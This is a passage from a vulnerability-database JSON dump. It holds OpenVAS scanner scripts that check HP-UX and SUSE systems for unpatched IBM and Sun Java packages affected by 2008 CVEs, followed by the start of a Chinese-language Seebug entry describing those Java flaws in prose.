}\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65907", "href": "http://plugins.openvas.org/nasl.php?oid=65907", "type": "openvas", "title": "SLES10: Security update for IBM Java 1.5.0", "sourceData": "#\n#VID slesp2-java-1_5_0-ibm-5960\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.5.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_5_0-ibm\n java-1_5_0-ibm-alsa\n java-1_5_0-ibm-devel\n java-1_5_0-ibm-fonts\n java-1_5_0-ibm-jdbc\n java-1_5_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65907);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for IBM Java 1.5.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm\", rpm:\"java-1_5_0-ibm~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-alsa\", rpm:\"java-1_5_0-ibm-alsa~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-devel\", rpm:\"java-1_5_0-ibm-devel~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-fonts\", rpm:\"java-1_5_0-ibm-fonts~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-jdbc\", rpm:\"java-1_5_0-ibm-jdbc~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-ibm-plugin\", rpm:\"java-1_5_0-ibm-plugin~1.5.0_sr9~2.4\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065489", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065489", "type": "openvas", "title": "SLES9: Security update for IBM Java5 JRE and SDK", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5041763.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for IBM Java5 JRE and SDK\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65489\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for IBM Java5 JRE and SDK\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"IBMJava5-JRE\", rpm:\"IBMJava5-JRE~1.5.0~0.57\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65489", "href": "http://plugins.openvas.org/nasl.php?oid=65489", "type": "openvas", "title": "SLES9: Security update for IBM Java5 JRE and SDK", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5041763.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for IBM Java5 JRE and SDK\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65489);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for IBM Java5 JRE and SDK\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"IBMJava5-JRE\", rpm:\"IBMJava5-JRE~1.5.0~0.57\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:19:48", "description": "BUGTRAQ ID: 32620,32608\r\nCVE(CAN) ID: CVE-2008-5339,CVE-2008-5340,CVE-2008-5341,CVE-2008-5342,CVE-2008-5343,CVE-2008-5344,CVE-2008-5345,CVE-2008-5346,CVE-2008-5347,CVE-2008-5348,CVE-2008-5349,CVE-2008-5350,CVE-2008-5351,CVE-2008-5352,CVE-2008-5353,CVE-2008-5354,CVE-2008-5355,CVE-2008-5356,CVE-2008-5357,CVE-2008-5358,CVE-2008-5359,CVE-2008-5360,CVE-2008-2086\r\n\r\nSolaris\u7cfb\u7edf\u7684Java\u8fd0\u884c\u65f6\u73af\u5883\uff08JRE\uff09\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u3002 \r\n\r\nSun Java\u4e2d\u7684\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u6076\u610f\u7528\u6237\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3001\u6cc4\u9732\u7cfb\u7edf\u4fe1\u606f\u3001\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u6709\u6f0f\u6d1e\u7684\u7cfb\u7edf\u3002\r\n\r\n1) JRE\u521b\u5efa\u4e86\u540d\u79f0\u4e0d\u8fc7\u968f\u673a\u7684\u4e34\u65f6\u6587\u4ef6\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u5199\u5165\u4efb\u610fJAR\u6587\u4ef6\u5e76\u6267\u884c\u6709\u9650\u7684\u64cd\u4f5c\u3002\r\n\r\n2) Java AWT\u5e93\u5728\u5904\u7406\u56fe\u5f62\u6a21\u578b\u65f6\u5b58\u5728\u9519\u8bef\uff0c\u5728ConvolveOp\u64cd\u4f5c\u4e2d\u4f7f\u7528\u7684\u7279\u5236Raster\u56fe\u5f62\u6a21\u578b\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n3) Java Web Start\u5728\u5904\u7406\u67d0\u4e9bGIF\u5934\u503c\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684splash logo\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u3002\r\n\r\n4) \u5904\u7406TrueType\u5b57\u4f53\u65f6\u7684\u6574\u6570\u6ea2\u51fa\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n5) JRE\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u521b\u5efa\u5230\u4efb\u610f\u4e3b\u673a\u7684\u7f51\u7edc\u8fde\u63a5\u3002\r\n\r\n6) \u542f\u52a8Java Web Start\u5e94\u7528\u7a0b\u5e8f\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684\u5e94\u7528\u7a0b\u5e8f\u4ee5\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n7) \u4e0d\u53ef\u4fe1\u4efb\u7684Java Web Start\u5e94\u7528\u7a0b\u5e8f\u53ef\u4ee5\u83b7\u53d6\u5f53\u524d\u7528\u6237\u540d\u548cJava Web Start\u7f13\u5b58\u7684\u4f4d\u7f6e\u3002\r\n\r\n8) Java Web Start\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684JNLP\u6587\u4ef6\u4fee\u6539\u7cfb\u7edf\u5c5e\u6027\uff0c\u5982java.home\u3001java.ext.dirs\u548cuser.home\u3002\r\n\r\n9) Java Web Start\u548cJava Plug-in\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u52ab\u6301HTTP\u4f1a\u8bdd\u3002\r\n\r\n10) JRE applet\u7c7b\u52a0\u8f7d\u529f\u80fd\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\u548c\u521b\u5efa\u5230\u4efb\u610f\u4e3b\u673a\u7684\u7f51\u7edc\u8fde\u63a5\u3002\r\n\r\n11) Java Web Start BasicService\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6253\u5f00\u4efb\u610f\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n12) Java Update\u673a\u5236\u6ca1\u6709\u68c0\u67e5\u4e0b\u8f7d\u7684\u66f4\u65b0\u8f6f\u4ef6\u5305\u7684\u6570\u5b57\u7b7e\u540d\uff0c\u8fd9\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u4e2d\u95f4\u4eba\u6216DNS\u4f2a\u9020\u653b\u51fb\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n13) \u5728\u5904\u7406JAR\u6587\u4ef6\u7684Main-Class\u6e05\u5355\u9879\u65f6\u7684\u8fb9\u754c\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684JAR\u6587\u4ef6\u5bfc\u81f4\u6808\u6ea2\u51fa\u3002\r\n\r\n14) \u8fd8\u539f\u5e8f\u5217\u53f7\u65e5\u5386\u5bf9\u8c61\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684Java applet\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n15) JRE\u4e2d\u7684\u6574\u6570\u6ea2\u51fa\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684Pack200\u538b\u7f29JAR\u6587\u4ef6\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n16) UTF-8\u89e3\u7801\u5668\u63a5\u53d7\u957f\u4e8e\u6700\u77ed\u8868\u5355\u7684\u7f16\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u4f7f\u7528\u89e3\u7801\u5668\u7684\u5e94\u7528\u7a0b\u5e8f\u901a\u8fc7\u7279\u5236URI\u63a5\u53d7\u65e0\u6548\u7684\u5e8f\u5217\u548c\u6cc4\u9732\u654f\u611f\u4fe1\u606f\u3002\r\n\r\n17) JRE\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u5217\u51fa\u7528\u6237\u4e3b\u76ee\u5f55\u7684\u5185\u5bb9\u3002\r\n\r\n18) \u5904\u7406RSA\u516c\u94a5\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u6d88\u8017\u5927\u91cfCPU\u8d44\u6e90\u3002\r\n\r\n19) JRE Kerberos\u8ba4\u8bc1\u673a\u5236\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u8017\u5c3d\u64cd\u4f5c\u7cfb\u7edf\u8d44\u6e90\u3002\r\n\r\n20) JAX-WS\u548cJAXB JRE\u8f6f\u4ef6\u5305\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684Java applet\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n21) \u5904\u7406ZIP\u6587\u4ef6\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u6cc4\u9732\u4e3b\u673a\u8fdb\u7a0b\u7684\u4efb\u610f\u5185\u5b58\u4f4d\u7f6e\u3002\r\n\r\n22) \u4ece\u672c\u5730\u6587\u4ef6\u7cfb\u7edf\u6240\u52a0\u8f7d\u7684\u6076\u610f\u4ee3\u7801\u53ef\u80fd\u83b7\u53d6\u5bf9\u672c\u5730\u4e3b\u673a\u7684\u7f51\u7edc\u8bbf\u95ee\u3002\r\n\r\n23) \u5904\u7406TrueType\u5b57\u4f53\u65f6\u7684\u8fb9\u754c\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\n\nSun JDK <= 6 Update 10\r\nSun JDK <= 5.0 Update 16\r\nSun JRE <= 6 Update 10\r\nSun JRE <= 5.0 Update 16\r\nSun SDK 1.4.2\r\nSun SDK 1.3.1\n RedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2008:1025-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2008:1025-01\uff1aCritical: java-1.5.0-sun security update\r\n\u94fe\u63a5\uff1a<a href=https://www.redhat.com/support/errata/RHSA-2008-1025.html 